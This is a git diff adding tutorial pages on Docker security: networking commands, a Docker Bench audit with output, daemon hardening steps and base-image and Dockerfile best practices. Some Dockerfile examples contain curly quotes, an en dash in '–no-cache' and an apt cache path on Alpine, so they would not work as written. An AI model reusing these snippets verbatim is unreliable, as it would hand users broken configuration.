+- Overlay - used for multi-host networking; it allows a single network to span multiple hosts so that containers on different hosts can communicate at layer 2
+
+- Macvlan - useful for legacy and monitoring apps that expect to be directly connected to the physical network; it assigns a MAC address to the container so it appears as a physical device on your network
+
+- None - completely isolates the container's networking stack; no IP address is configured with this driver
+
+
+# Docker Networking (Hands-on)
+
+```
+$ docker network --help
+
+```
+1. Check which networks are already present in Docker by default (`docker network ls`), then start a container:
+
+```
+$ docker run -itd --name netcon ubuntu /bin/bash
+```
+Check the network placement of this container within the above networks. By default all containers get attached to the bridge network; this can be verified with the `network inspect` command:
+
+```
+$ docker network inspect bridge
+```
+
+The `Containers` section of the output contains the information about the container name, IPv4 address, etc.
+
+Run another container, `net2con`, from the busybox image and check its network placement the same way as above:
+
+```
+docker run -itd --name net2con busybox /bin/bash
+```
+
+Let us now run an nginx container named `net3con-web` with an exposed port:
+
+```
+docker run -itd --name net3con-web -p 5000:80 nginx
+
+```
+
+To check that the port is correctly set up and exposed, you can use the `port` command followed by the container name:
+
+```
+
+docker port net3con-web
+```
+
+To see only the relevant information, which is the `Containers` block from the `inspect` command output, use the `-f` option to format the JSON and parse it via the `jq` utility:
+
+```
+docker network inspect bridge -f "{{json .Containers}}" | jq
+```
+
+You can also observe that the `bridge.id` is associated with the default `docker0` bridge, with all the containers attached via `vethxxxxxx` virtual Ethernet interfaces:
+
+```
+$ brctl show
+```
+
+# Conclusion
+
+Cgroups and namespaces provide essential isolation and limit container resources. This is highly valuable for the Docker host in the case of DoS attacks: if resource limits are set conservatively, less harm can be done. For resource isolation, take a look at the Linux 'cgcreate', 'cgdelete', and 'cgset' utilities and related parameters such as 'cpuset' and 'cpuacct'. A good way to internalize all of this:
Running containers and walking around the namespaces, cgroups, container networking + + + diff --git a/content/en/containersecurity/b13.Auditing-docker-sec 2.md b/content/en/containersecurity/b13.Auditing-docker-sec 2.md new file mode 100644 index 0000000..5ae3497 --- /dev/null +++ b/content/en/containersecurity/b13.Auditing-docker-sec 2.md @@ -0,0 +1,501 @@ +--- +title: "Auditing Docker Security " +slug: "Auditing-Docker-Security" +--- + +## Auditing Docker Security + +DOCKER BENCH FOR SECURITY + +Docker Bench for Security is an open source Bash script that checks for various common security best practices of deploying Docker in production environments. The tests are all automated and are based on the CIS Docker Benchmark. More information about Docker Bench for Security can be found +on GitHub: https://github.com/docker/docker-bench-security + + +## auditing docker security with docker bench for security + + +The auditing process can be performed by following the procedures outlined below: + +You first need to clone the docker/docker-bench-security GitHub repository on your Docker host. This can be done by running the following command: + + +``` +git clone https://github.com/docker/docker-bench-security.git +``` +After cloning the repository, you will need to navigate into the docker-bench-security repository that you just cloned: + +``` +cd docker-bench-security + + +``` + +The cloned directory will contain a Bash script named docker-bench-security.sh. We can run this script to perform the Docker security audit by running the following command: + +``` +sudo ./docker-bench-security.sh +``` + +When the script is executed, it will perform all the necessary security checks. Once completed, it will provide you with a baseline security score as highlighted + +``` +Section C - Score + +[INFO] Checks: 117 +[INFO] Score: -5 + +``` + +# Docker Bench for Security Options + +```bash + b optional Do not print colors + -h optional Print this help message + -l FILE optional Log output in FILE, inside container if run using docker + -u USERS optional Comma delimited list of trusted docker user(s) + -c CHECK optional Comma delimited list of specific check(s) id + -e CHECK optional Comma delimited list of specific check(s) id to exclude + -i INCLUDE optional Comma delimited list of patterns within a container or image name to check + -x EXCLUDE optional Comma delimited list of patterns within a container or image name to exclude from check + -n LIMIT optional In JSON output, when reporting lists of items (containers, images, etc.), limit the number of reported items to LIMIT. Default 0 (no limit). + -p PRINT optional Disable the printing of remediation measures. Default: print remediation measures. + +``` + +## Running Docker Bench for poticular docker images + +```bash +sudo ./docker-bench-security.sh -i hello-world +Password: +# -------------------------------------------------------------------------------------------- +# Docker Bench for Security v1.3.6 +# +# Docker, Inc. (c) 2015-2023 +# +# Checks for dozens of common best-practices around deploying Docker containers in production. +# Based on the CIS Docker Benchmark 1.4.0. 
+# -------------------------------------------------------------------------------------------- + +Initializing 2023-01-04T19:09:21:z + + +Section A - Check results + +[INFO] 1 - Host Configuration +[INFO] 1.1 - Linux Hosts Specific Configuration +[WARN] 1.1.1 - Ensure a separate partition for containers has been created (Automated) +[INFO] 1.1.2 - Ensure only trusted users are allowed to control Docker daemon (Automated) +[INFO] * Users: +[WARN] 1.1.3 - Ensure auditing is configured for the Docker daemon (Automated) +[WARN] 1.1.4 - Ensure auditing is configured for Docker files and directories -/run/containerd (Automated) +[INFO] 1.1.5 - Ensure auditing is configured for Docker files and directories - /var/lib/docker (Automated) +[INFO] * Directory not found +[INFO] 1.1.6 - Ensure auditing is configured for Docker files and directories - /etc/docker (Automated) +[INFO] * Directory not found +[INFO] 1.1.7 - Ensure auditing is configured for Docker files and directories - docker.service (Automated) +[INFO] * File not found +[INFO] 1.1.8 - Ensure auditing is configured for Docker files and directories - containerd.sock (Automated) +[INFO] * File not found +[INFO] 1.1.9 - Ensure auditing is configured for Docker files and directories - docker.socket (Automated) +[INFO] * File not found +[INFO] 1.1.10 - Ensure auditing is configured for Docker files and directories - /etc/default/docker (Automated) +[INFO] * File not found +[INFO] 1.1.11 - Ensure auditing is configured for Dockerfiles and directories - /etc/docker/daemon.json (Automated) +[INFO] * File not found +[INFO] 1.1.12 - 1.1.12 Ensure auditing is configured for Dockerfiles and directories - /etc/containerd/config.toml (Automated) +[INFO] * File not found +[INFO] 1.1.13 - Ensure auditing is configured for Docker files and directories - /etc/sysconfig/docker (Automated) +[INFO] * File not found +[INFO] 1.1.14 - Ensure auditing is configured for Docker files and directories - /usr/bin/containerd (Automated) +[INFO] * File not found +[INFO] 1.1.15 - Ensure auditing is configured for Docker files and directories - /usr/bin/containerd-shim (Automated) +[INFO] * File not found +[INFO] 1.1.16 - Ensure auditing is configured for Docker files and directories - /usr/bin/containerd-shim-runc-v1 (Automated) +[INFO] * File not found +[INFO] 1.1.17 - Ensure auditing is configured for Docker files and directories - /usr/bin/containerd-shim-runc-v2 (Automated) +[INFO] * File not found +[INFO] 1.1.18 - Ensure auditing is configured for Docker files and directories - /usr/bin/runc (Automated) +[INFO] * File not found +[INFO] 1.2 - General Configuration +[NOTE] 1.2.1 - Ensure the container host has been Hardened (Manual) +date: illegal time format +usage: date [-jnRu] [-r seconds|file] [-v[+|-]val[ymwdHMS]] + [-I[date | hours | minutes | seconds]] + [-f fmt date | [[[mm]dd]HH]MM[[cc]yy][.ss]] [+format] +./functions/helper_lib.sh: line 36: [: : integer expression expected +./functions/helper_lib.sh: line 37: [: : integer expression expected +[PASS] 1.2.2 - Ensure that the version of Docker is up to date (Manual) +[INFO] * Using 20.10.21 which is current +[INFO] * Check with your operating system vendor for support and security maintenance for Docker + +[INFO] 2 - Docker daemon configuration +[NOTE] 2.1 - Run the Docker daemon as a non-root user, if possible (Manual) +[WARN] 2.2 - Ensure network traffic is restricted between containers on the default bridge (Scored) +[PASS] 2.3 - Ensure the logging level is set to 'info' (Scored) +[PASS] 2.4 - Ensure Docker 
is allowed to make changes to iptables (Scored) +[PASS] 2.5 - Ensure insecure registries are not used (Scored) +[PASS] 2.6 - Ensure aufs storage driver is not used (Scored) +[INFO] 2.7 - Ensure TLS authentication for Docker daemon is configured (Scored) +[INFO] * Docker daemon not listening on TCP +[INFO] 2.8 - Ensure the default ulimit is configured appropriately (Manual) +[INFO] * Default ulimit doesn't appear to be set +[WARN] 2.9 - Enable user namespace support (Scored) +[PASS] 2.10 - Ensure the default cgroup usage has been confirmed (Scored) +[PASS] 2.11 - Ensure base device size is not changed until needed (Scored) +[WARN] 2.12 - Ensure that authorization for Docker client commands is enabled (Scored) +[WARN] 2.13 - Ensure centralized and remote logging is configured (Scored) +[WARN] 2.14 - Ensure containers are restricted from acquiring new privileges (Scored) +[WARN] 2.15 - Ensure live restore is enabled (Scored) +[WARN] 2.16 - Ensure Userland Proxy is Disabled (Scored) +[PASS] 2.17 - Ensure that a daemon-wide custom seccomp profile is applied if appropriate (Manual) +[INFO] Ensure that experimental features are not implemented in production (Scored) (Deprecated) + +[INFO] 3 - Docker daemon configuration files +[INFO] 3.1 - Ensure that the docker.service file ownership is set to root:root (Automated) +[INFO] * File not found +[INFO] 3.2 - Ensure that docker.service file permissions are appropriately set (Automated) +[INFO] * File not found +[INFO] 3.3 - Ensure that docker.socket file ownership is set to root:root (Automated) +[INFO] * File not found +[INFO] 3.4 - Ensure that docker.socket file permissions are set to 644 or more restrictive (Automated) +[INFO] * File not found +[INFO] 3.5 - Ensure that the /etc/docker directory ownership is set to root:root (Automated) +[INFO] * Directory not found +[INFO] 3.6 - Ensure that /etc/docker directory permissions are set to 755 or more restrictively (Automated) +[INFO] * Directory not found +[INFO] 3.7 - Ensure that registry certificate file ownership is set to root:root (Automated) +[INFO] * Directory not found +[INFO] 3.8 - Ensure that registry certificate file permissions are set to 444 or more restrictively (Automated) +[INFO] * Directory not found +[INFO] 3.9 - Ensure that TLS CA certificate file ownership is set to root:root (Automated) +[INFO] * No TLS CA certificate found +[INFO] 3.10 - Ensure that TLS CA certificate file permissions are set to 444 or more restrictively (Automated) +[INFO] * No TLS CA certificate found +[INFO] 3.11 - Ensure that Docker server certificate file ownership is set to root:root (Automated) +[INFO] * No TLS Server certificate found +[INFO] 3.12 - Ensure that the Docker server certificate file permissions are set to 444 or more restrictively (Automated) +[INFO] * No TLS Server certificate found +[INFO] 3.13 - Ensure that the Docker server certificate key file ownership is set to root:root (Automated) +[INFO] * No TLS Key found +[INFO] 3.14 - Ensure that the Docker server certificate key file permissions are set to 400 (Automated) +[INFO] * No TLS Key found +stat: illegal option -- c +usage: stat [-FLnq] [-f format | -l | -r | -s | -x] [-t timefmt] [file ...] +[WARN] 3.15 - Ensure that the Docker socket file ownership is set to root:docker (Automated) +[WARN] * Wrong ownership for /var/run/docker.sock +stat: illegal option -- c +usage: stat [-FLnq] [-f format | -l | -r | -s | -x] [-t timefmt] [file ...] 
+./tests/3_docker_daemon_configuration_files.sh: line 429: [: : integer expression expected +[WARN] 3.16 - Ensure that the Docker socket file permissions are set to 660 or more restrictively (Automated) +[WARN] * Wrong permissions for /var/run/docker.sock +[INFO] 3.17 - Ensure that the daemon.json file ownership is set to root:root (Automated) +[INFO] * File not found +[INFO] 3.18 - Ensure that daemon.json file permissions are set to 644 or more restrictive (Automated) +[INFO] * File not found +[INFO] 3.19 - Ensure that the /etc/default/docker file ownership is set to root:root (Automated) +[INFO] * File not found +[INFO] 3.20 - Ensure that the /etc/sysconfig/docker file permissions are set to 644 or more restrictively (Automated) +[INFO] * File not found +[INFO] 3.21 - Ensure that the /etc/sysconfig/docker file ownership is set to root:root (Automated) +[INFO] * File not found +[INFO] 3.22 - Ensure that the /etc/default/docker file permissions are set to 644 or more restrictively (Automated) +[INFO] * File not found +[INFO] 3.23 - Ensure that the Containerd socket file ownership is set to root:root (Automated) +[INFO] * File not found +[INFO] 3.24 - Ensure that the Containerd socket file permissions are set to 660 or more restrictively (Automated) +[INFO] * File not found +[INFO] 4 - Container Images and Build File +[INFO] 4.1 - Ensure that a user for the container has been created (Automated) +[INFO] * No containers running +[NOTE] 4.2 - Ensure that containers use only trusted base images (Manual) +[NOTE] 4.3 - Ensure that unnecessary packages are not installed in the container (Manual) +[NOTE] 4.4 - Ensure images are scanned and rebuilt to include security patches (Manual) +[WARN] 4.5 - Ensure Content trust for Docker is Enabled (Automated) +[PASS] 4.6 - Ensure that HEALTHCHECK instructions have been added to container images (Automated) +[PASS] 4.7 - Ensure update instructions are not used alone in the Dockerfile (Manual) +[NOTE] 4.8 - Ensure setuid and setgid permissions are removed (Manual) +[PASS] 4.9 - Ensure that COPY is used instead of ADD in Dockerfiles (Manual) +[NOTE] 4.10 - Ensure secrets are not stored in Dockerfiles (Manual) +[NOTE] 4.11 - Ensure only verified packages are installed (Manual) +[NOTE] 4.12 - Ensure all signed artifacts are validated (Manual) +[INFO] 5 - Container Runtime +[INFO] * No containers running, skipping Section 5 +[INFO] 6 - Docker Security Operations +[INFO] 6.1 - Ensure that image sprawl is avoided (Manual) +[INFO] * There are currently: 13 images +[INFO] * Only 0 out of 13 are in use +[INFO] 6.2 - Ensure that container sprawl is avoided (Manual) +[INFO] * There are currently a total of 40 containers, with 18 of them currently running +[INFO] 7 - Docker Swarm Configuration +[PASS] 7.1 - Ensure swarm mode is not Enabled, if not needed (Automated) +[PASS] 7.2 - Ensure that the minimum number of manager nodes have been created in a swarm (Automated) (Swarm mode not enabled) +[PASS] 7.3 - Ensure that swarm services are bound to a specific host interface (Automated) (Swarm mode not enabled) +[PASS] 7.4 - Ensure that all Docker swarm overlay networks are encrypted (Automated) +[PASS] 7.5 - Ensure that Docker's secret management commands are used for managing secrets in a swarm cluster (Manual) (Swarm mode not enabled) +[PASS] 7.6 - Ensure that swarm manager is run in auto-lock mode (Automated) (Swarm mode not enabled) +[PASS] 7.7 - Ensure that the swarm manager auto-lock key is rotated periodically (Manual) (Swarm mode not enabled) +[PASS] 7.8 - Ensure 
that node certificates are rotated as appropriate (Manual) (Swarm mode not enabled)
+[PASS] 7.9 - Ensure that CA certificates are rotated as appropriate (Manual) (Swarm mode not enabled)
+[PASS] 7.10 - Ensure that management plane traffic is separated from data plane traffic (Manual) (Swarm mode not enabled)
+
+
+Section C - Score
+[INFO] Checks: 86
+[INFO] Score: -1
+
+
+```
+
+# Run the Docker daemon as a non-root user, if possible (Manual)
+
+By default, Docker containers run with root privileges, and so does the application that runs inside them. This is a major security concern because an attacker who compromises the application inside a container may be able to escalate to root on the Docker host.
+
+Add your user to the docker group
+
+Create the docker group if it does not already exist:
+
+```bash
+$ sudo groupadd docker
+```
+Then add your user to the docker group:
+
+```bash
+sudo usermod -aG docker [non-root user]
+
+```
+
+Using a Dockerfile (USER instruction)
+
+Edit the Dockerfile so that it creates a non-root user and switches the default root user to the newly created non-root user, as shown here:
+
+
+```Dockerfile
+##########################################
+# Dockerfile to change from root to
+# non-root privilege
+###########################################
+# Base image is CentOS 7
+FROM centos:7
+# Add a new user "sangam" with user id 8877
+RUN useradd -u 8877 sangam
+# Change to non-root privilege
+USER sangam
+
+```
+
+Proceed to build the Docker image using the "docker build" subcommand, as depicted here:
+
+```bash
+sudo docker build -t nonrootimage .
+
+```
+Finally, let's verify the current user of our container by running the id command in a docker run subcommand:
+
+```bash
+sudo docker run --rm nonrootimage id
+```
+
+# Ensure network traffic is restricted between containers on the default bridge
+
+```bash
+sudo docker network ls
+Password:
+NETWORK ID     NAME                                                          DRIVER    SCOPE
+beb64c03a4cf   bridge                                                        bridge    local
+1d337b15d114   host                                                          host      local
+88ea4badd709   meshery_docker-extension-meshery-desktop-extension_default   bridge    local
+3be4c0abf1a8   minikube                                                      bridge    local
+47444c7b3650   multinode-pod-security                                        bridge    local
+ed5ab538e49a   none                                                          null      local
+```
+
+```bash
+sudo docker network inspect bridge
+
+Password:
+[
+    {
+        "Name": "bridge",
+        "Id": "beb64c03a4cf6c3385fd311edf8a3ff76670f62045068bad43ad4fcfe40f5c72",
+        "Created": "2023-01-04T11:46:52.643189959Z",
+        "Scope": "local",
+        "Driver": "bridge",
+        "EnableIPv6": false,
+        "IPAM": {
+            "Driver": "default",
+            "Options": null,
+            "Config": [
+                {
+                    "Subnet": "172.17.0.0/16",
+                    "Gateway": "172.17.0.1"
+                }
+            ]
+        },
+        "Internal": false,
+        "Attachable": false,
+        "Ingress": false,
+        "ConfigFrom": {
+            "Network": ""
+        },
+        "ConfigOnly": false,
+        "Containers": {},
+        "Options": {
+            "com.docker.network.bridge.default_bridge": "true",
+            "com.docker.network.bridge.enable_icc": "true",
+            "com.docker.network.bridge.enable_ip_masquerade": "true",
+            "com.docker.network.bridge.host_binding_ipv4": "0.0.0.0",
+            "com.docker.network.bridge.name": "docker0",
+            "com.docker.network.driver.mtu": "1500"
+        },
+        "Labels": {}
+    }
+]
+
+
+```
+If it is not required, you should restrict network traffic between containers.
+
+By default, unrestricted network traffic is enabled amongst all containers on the same host in the default network bridge. However, a bad actor positioned in a compromised container could leverage this functionality to abuse other services exposed by other containers within the container network on the same host. 
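+
+To see this unrestricted traffic for yourself, a rough check along the following lines can be run on a host that still has the default bridge settings. This is only an illustrative sketch: the images, container name, and variable below are not part of the original audit and can be swapped for anything you like.
+
+```bash
+# Start a target container on the default bridge and look up its IP address
+docker run -d --name icc-target nginx:alpine
+TARGET_IP=$(docker inspect -f '{{ .NetworkSettings.IPAddress }}' icc-target)
+
+# A second container on the same default bridge can reach it without any restriction
+docker run --rm alpine:latest ping -c 2 "$TARGET_IP"
+
+# Clean up the test container
+docker rm -f icc-target
+```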
+
+To disable inter-container communication, configure the daemon with the icc flag set to false. Note that this configuration can be overridden by containers that are run with the deprecated --link option.
+
+
+```bash
+$ docker network ls -q | xargs docker network inspect -f '{{ .Name }}: {{ .Options }}'
+```
+The com.docker.network.bridge.enable_icc option should be set to false for the default network bridge.
+
+You should also consider using user-defined bridge networks to enforce network isolation among containers, which is a more flexible solution.
+
+# Protect the UNIX socket from unintended access
+
+
+
+The non-networked /var/run/docker.sock UNIX socket is used by default to locally access the Docker Engine API. The safe default on Linux is a socket file owned by the root user and the docker group, with read and write permission limited to that user and group (660, i.e. ug+rw).
+
+Run this command to review the Docker UNIX socket permissions:
+
+```bash
+$ ls -l /var/run/docker.sock
+lrwxr-xr-x  1 root  daemon  44  4 Jan 17:16 /var/run/docker.sock -> /Users/sangambiradar/.docker/run/docker.sock
+```
+
+Note that on Docker Desktop for macOS the socket is a symlink into the user's home directory and is owned by root:daemon, which is why the benchmark above flags its ownership and permissions.
+
+# Use secure registries to pull and push images
+
+Insecure registries either do not use TLS or use an invalid TLS certificate. Such registries should not be used, as they are prone to man-in-the-middle (MITM) attacks by malicious actors who are able to modify the network traffic.
+
+Run the command below to list the insecure registries used by the Docker daemon:
+
+```bash
+
+docker info --format '{{.RegistryConfig.InsecureRegistryCIDRs}}'
+
+```
+
+# Enable user namespace support
+```bash
+ps aux | grep dockerd
+sangambiradar    34266   0.0  0.0 408626880   1280 s000  S+    7:22PM   0:00.00 grep --color=auto --exclude-dir=.bzr --exclude-dir=CVS --exclude-dir=.git --exclude-dir=.hg --exclude-dir=.svn --exclude-dir=.idea --exclude-dir=.tox dockerd
+```
+
+```bash
+docker container run -it --rm alpine /bin/sh
+Unable to find image 'alpine:latest' locally
+latest: Pulling from library/alpine
+261da4162673: Pull complete
+Digest: sha256:8914eb54f968791faf6a8638949e480fef81e697984fba772b3976835194c6d4
+Status: Downloaded newer image for alpine:latest
+/ # whoami
+root
+```
+
+To follow the principle of least privilege, containerized applications should not be run as root. To achieve this, the --user parameter can be used to specify a user other than root for the container. It accepts a username (if it was previously created in the Dockerfile) or a UID as its value, optionally followed by a GID. At the daemon level, user namespace remapping can be enabled with the userns-remap setting, which appears in the daemon.json example later in this post.
+
+## Enable Content Trust
+Ensure content trust for Docker is enabled. Content trust is a system for signing Docker images and verifying their signatures before running them. We can enable content trust with the `DOCKER_CONTENT_TRUST` environment variable.
+
+To set this variable for your current shell session, type the following into the shell:
+
+```bash
+export DOCKER_CONTENT_TRUST=1
+
+```
+
+
+Running the audit again after this export should show that content trust has been enabled and clear this warning.
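+
+As a quick sanity check (a sketch, not part of the original audit output), you can confirm the variable is set in your current shell and look at the signature data Docker can retrieve for a signed image. Docker Official Images such as alpine publish trust data that `docker trust inspect` can display; the image name here is only an example.
+
+```bash
+# Confirm content trust is enabled for this shell
+echo "DOCKER_CONTENT_TRUST=$DOCKER_CONTENT_TRUST"
+
+# Review the signers and signed tags for an official image (requires network access to the registry)
+docker trust inspect --pretty alpine:latest
+```
+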
To enable it automatically for all users and all sessions, add the `DOCKER_CONTENT_TRUST` variable to the `/etc/environment` file, which is a file for assigning system-wide environment variables: + +```bash +echo "DOCKER_CONTENT_TRUST=1" | sudo tee -a /etc/environment + +``` + +## Ensure auditing is configured for various Docker files + +```bash +sudo apt-get install auditd +``` + +```bash +sudo nano /etc/audit/audit.rules +ubuntu@enormous-longspur:~$ sudo cat /etc/audit/audit.rules +## This file is automatically generated from /etc/audit/rules.d +-D +-b 8192 +-f 1 +--backlog_wait_time 60000 + +-w /usr/bin/docker -p wa +-w /var/lib/docker -p wa +-w /etc/docker -p wa +-w /lib/systemd/system/docker.service -p wa +-w /lib/systemd/system/docker.socket -p wa +-w /etc/default/docker -p wa +-w /etc/docker/daemon.json -p wa +-w /usr/bin/docker-containerd -p wa +-w /usr/bin/docker-runc -p wa + +``` + +Restart auditd for the changes to take effect: + +```bash +sudo systemctl restart auditd +``` + +## Correcting Docker Daemon Configuration Warnings + +```bash +sudo nano /etc/docker/daemon.json +ubuntu@docker:~/docker-bench-security$ cat nano /etc/docker/daemon.json +cat: nano: No such file or directory + +{ + "icc": false, + "userns-remap": "default", + "log-driver": "syslog", + "disable-legacy-registry": true, + "live-restore": true, + "userland-proxy": false, + "no-new-privileges": true +} +ubuntu@docker:~/docker-bench-security$ + +sudo systemctl restart docker + +``` + +## Enable Content Trust + +Content trust is a system for signing Docker images and verifying their signatures before running them. We can enable content trust with the DOCKER_CONTENT_TRUST environment variable. + +```bash +export DOCKER_CONTENT_TRUST=1 + +``` + +Running the audit after this export command should show that Content trust has been enabled and clear this warning. 
To enable it automatically for all users and all sessions, add the DOCKER_CONTENT_TRUST variable to the /etc/environment file, which is a file for assigning system-wide environment variables: + +```bash +echo "DOCKER_CONTENT_TRUST=1" | sudo tee -a /etc/environment + +``` \ No newline at end of file diff --git a/content/en/containersecurity/b14.Container-image-security 2.md b/content/en/containersecurity/b14.Container-image-security 2.md new file mode 100644 index 0000000..97f1fdc --- /dev/null +++ b/content/en/containersecurity/b14.Container-image-security 2.md @@ -0,0 +1,265 @@ +--- +title: "Container Image Security " +description: "Container Image Security " +slug: "container-image-security" +--- + +## Container Image Security + + - Building secure container images + +## Choosing base images + + # Alpine +- Pros + - very small images: the community pays a lot attention on minimizing image sizes + - minimum functionality: only absolutely necessary packages contained + - lightweight init system: like Gentoo, Alpine uses OpenRC, a lightweight alternative to systemd + - musl performance: for some cases, [musl libc](https://musl.libc.org) can be more performant than [glibc](https://www.gnu.org/software/libc/) +- Cons + - rather Poor Documentation + - Small team : Currently there are [3 developer listed ](https://wiki.alpinelinux.org/wiki/Alpine_Linux:Developers + ) as the alpine linux team + - possible incompatibilities: musl libc may cause problems with some C-based plugins and adjustments may be necessary if you compile software yourself + +# Debian + +- Pro: + - small images: the size of slimmed down Debian images (such as minideb by Bitnami) is almost on par with Alpine (e.g. m[minideb](https://github.com/bitnami/minideb) + Python is [just 7 MB larger than Alpine + Python](https://dzone.com/articles/minideb-a-minimalist-debian-based-docker-image)) + - lots of packages: there's hardly any software for Linux which hasn't been packaged for Debian + - well tested: due to its popularity, Debian is used widely and issues are more likely to be found + - comprehensive documentation; also, the community produced a big amount of additional documentations and tutorials + - more security reviews: again, due to its larger community, Debian gets more attention and its more likely that vulnerabilities are discovered, e.g in glibc versus in musl libc (assumption). Debian also has a [security audit team](https://www.debian.org/security/), which proactively looks for security issues. + - provenance: validating authenticity of packages is possible, e.g. with debsigs / dpkgsig + +- Con: + + - slightly larger attack surface: minideb consists of about 35 packages (such as bash, grep, hostname, mount …) due to apt depending on it + - more false positives: scanners may report more false positives you need to look at + +# Distroless images + +simple distroless Golang Example + +```go +package main + +import "fmt" + +func main() { + fmt.Println("Hello, world!") +} + +``` + +```Dockerfile +FROM golang:1.18 as build +WORKDIR /go/src/app +COPY . . +RUN go mod download +RUN go vet -v +RUN go test -v +RUN CGO_ENABLED=0 go build -o /go/bin/app +FROM gcr.io/distroless/static-debian11 +COPY --from=build /go/bin/app / +CMD ["/app"] +``` + + +- Distroless 2.0 project - uses Alpine as a minimalistic & secure base image, and with the help of two tools, apko and melange, allows to build an application-tailored image containing only (mostly?) the necessary bits. + + +- What is apko ? 
+  - Declarative OCI image builder tool based on apk
+  - Images are defined in YAML files
+  - Builds are fully reproducible
+  - Automatically generates SBOMs for every image
+  - Platform-agnostic builds via Docker + apko images
+
+
+  - Example apko.yaml file:
+
+```yaml
+contents:
+  repositories:
+  - https://dl-cdn.alpinelinux.org/alpine/edge/main
+  packages:
+  - alpine-base
+entrypoint:
+  command: /bin/sh -l
+# optional environment configuration
+environment:
+  PATH: /usr/sbin:/sbin:/usr/bin:/bin
+
+```
+
+Building the image with apko via Docker:
+
+```bash
+docker run -v "$PWD":/work cgr.dev/chainguard/apko build examples/alpine-base.yaml apko-alpine:edge apko-alpine.tar
+```
+
+Test the image with Docker:
+
+```bash
+$ docker load < apko-alpine.tar
+$ docker run -it apko-alpine:edge
+```
+
+- Why apko?
+  - apk, introduced by Alpine, takes a different approach to package management
+  - Package installation or removal is done as a side effect of modifying the system state
+  - This creates the ideal conditions for reproducible and declarative pipelines
+
+- Where do packages come from?
+  - For alpine-base images, use Alpine apks found at pkgs.alpinelinux.org/packages
+  - For Wolfi images, use Wolfi apks listed in the wolfi-os repository hosted at packages.wolfi.dev/os
+  - Don't mix the two!
+  - You can also create your own apks with melange
+
+- Why distroless?
+  - Minimalist container images with only what's absolutely necessary to build or execute your application
+  - Popular base images are full of software that only makes sense on bare metal
+  - No need for package managers or interactive shells in production images
+  - Fewer dependencies = smaller attack surface
+
+
+```bash
+docker run cgr.dev/chainguard/apko version
+```
+
+```bash
+docker run -v "$PWD":/work cgr.dev/chainguard/apko build examples/alpine-base.yaml apko-alpine:edge apko-alpine.tar
+
+```
+
+
+
+# Scratch Images
+
+The default golang image is great! It allows you to quickly build and test your Golang projects. But it has a few drawbacks: it is a massive 964 MB, and even the slimmed-down Alpine-based image is 327 MB. On top of that, unused binaries and packages open you up to security flaws.
+
+Using a multi-stage build allows you to produce smaller images by dropping all the packages used to build the binary and only including the ones required at runtime.
+
+```dockerfile
+# Create a builder stage
+FROM golang:alpine as builder
+
+RUN apk update
+RUN apk add --no-cache git ca-certificates \
+    && update-ca-certificates
+
+COPY . .
+
+# Fetch dependencies
+RUN go mod download
+RUN go mod verify
+
+# Build the binary
+RUN CGO_ENABLED=0 GOOS=linux GOARCH=amd64 \
+    go build -ldflags="-w -s" \
+    -o /go/bin/my-docker-binary
+
+# Create clean image
+FROM alpine:latest
+
+# Copy only the static binary
+COPY --from=builder /go/bin/my-docker-binary \
+    /go/bin/my-docker-binary
+
+# Run the binary
+ENTRYPOINT ["/go/bin/my-docker-binary"]
+
+```
+Great, now we have an image that's 20 MB, roughly a 95% reduction! Remember these are production images, so we use -ldflags="-w -s" to strip debug information (-w) and the Go symbol table (-s).
+
+
+## Scratch Image and Lowest Privilege User
+
+Now to get rid of all those unused packages: instead of using the alpine image as our final stage, we will use the scratch image, which contains literally nothing!
+
+We will also take this opportunity to create a non-root user. 
Add the following snippet to your builder stage + +``` + +ENV USER=appuser +ENV UID=10001 + +RUN adduser \ + --disabled-password \ + --gecos "" \ + --home "/nonexistent" \ + --shell "/sbin/nologin" \ + --no-create-home \ + --uid "$\{UID\}" \ + "$\{USER\}" + +``` + +We will need to copy over the ca-certificates to the final stage, this is only required if you are making https calls and we will also need to copy over the passwd and group files to use our appuser. Finally we need get the stage to use our user. + +``` +# Copy over the necessary files +COPY --from=builder \ + /etc/ssl/certs/ca-certificates.crt \ + /etc/ssl/certs/ +COPY --from=builder /etc/passwd /etc/passwd +COPY --from=builder /etc/group /etc/group +# Use our user! +USER appuser:appuser +``` + +So finally your Dockerfile should look something like this: + + +``` +# Create a builder stage +FROM golang:alpine as builder + +RUN apk update +RUN apk add --no-cache git ca-certificates \ + && update-ca-certificates + +ENV USER=appuser +ENV UID=10001 + +RUN adduser \ + --disabled-password \ + --gecos "" \ + --home "/nonexistent" \ + --shell "/sbin/nologin" \ + --no-create-home \ + --uid "${UID}" \ + "${USER}" + +COPY . . + +# Fetch dependencies +RUN go mod download +RUN go mod verify + +# Build the binary +RUN CGO_ENABLED=0 GOOS=linux GOARCH=amd64 \ + go build -ldflags="-w -s" \ + -o /go/bin/my-docker-binary + +# Create clean image +FROM scratch + +# Copy only the static binary +COPY --from=builder \ + /go/bin/my-docker-binary \ + /go/bin/my-docker-binary +COPY --from=builder \ + /etc/ssl/certs/ca-certificates.crt \ + /etc/ssl/certs/ +COPY --from=builder /etc/passwd /etc/passwd +COPY --from=builder /etc/group /etc/group + +# Use our user! +USER appuser:appuser + +# Run the binary +ENTRYPOINT ["/go/bin/my-docker-binary"] + +``` \ No newline at end of file diff --git a/content/en/containersecurity/b15.dockerfile-security 2.md b/content/en/containersecurity/b15.dockerfile-security 2.md new file mode 100644 index 0000000..d6421f0 --- /dev/null +++ b/content/en/containersecurity/b15.dockerfile-security 2.md @@ -0,0 +1,267 @@ +--- +title: "DockerFile Security Best Practices " +slug: "DockerFile-Security-Best-Practices" +--- + + +# DockerFile Security Best Practices + +- Choose Minimal Base Images + +![](./images/minimal.gif) + +```Dockerfile +FROM alpine +WORKDIR /app +COPY package.json /app +RUN npm install +CMD [β€œnode”,β€œindex.js”] + +``` + + +- Remove Cache Packages +![](./images/cache-package.jpeg) + +```Dockerfile +FROM alpine +RUN apk add nginx && rm -rf /var/cache/apt/* +COPY index.html /var/www/html/ +EXPOSE 80 +CMD [β€œnginx”,β€œ-g”,β€œdaemon off;”] +``` + +```Dockerfile +FROM alpine +RUN apk add –no-cache nginx +COPY index.html /var/www/html/ +EXPOSE 80 +CMD [β€œnginx”,β€œ-g”,β€œdaemon off;”] +``` + +- avoid multilayers + +![](https://miro.medium.com/max/1000/0*FMAsrFS11TCJaQl5.gif) + +```Dockerfile +FROM alpine +RUN apk update +RUN apk add curl +RUN apk add nodejs +RUN apk add nginx-1.16.1-r6 +RUN apk add nginx-mod-http-geoip2-1.16.1-r6 +COPY index.html /var/www/html/ +EXPOSE 80 +CMD [β€œnginx”,β€œ-g”,β€œdaemon off;”] 